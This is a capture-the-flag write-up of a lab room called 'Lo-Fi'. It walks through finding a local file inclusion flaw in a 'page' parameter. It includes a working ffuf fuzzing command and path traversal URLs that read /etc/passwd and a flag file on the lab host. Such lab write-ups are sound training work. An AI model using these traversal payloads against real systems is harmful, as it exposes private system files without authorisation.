Lo-Fi

Want to hear some lo-fi beats, to relax or study to? We've got you covered!

For this challenge, we skip the Nmap scan as the room description directs us to a specific webpage. Our objective is to test for local file inclusion. On the index page, we find links to various genres.

Clicking on a link redirects us via the "page" parameter. Additionally, there is a filter in place that blocks absolute paths.

http://lofi.thm/?page=

We test the "page" parameter for Local File Inclusion (LFI) using FFuF with the LFI-Jhaddix.txt wordlist and successfully identify several valid paths.

ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-Jhaddix.txt -u "http://lofi.thm/?page=FUZZ" -fl 124

We attempt a basic local file inclusion by accessing /etc/passwd, and it works successfully.

http://lofi.thm/?page=../../../etc/passwd

Next, we attempt to include the /flag.txt file located in the root directory, and we successfully retrieve it.

http://lofi.thm/?page=../../../flag.txt

Last updated

Was this helpful?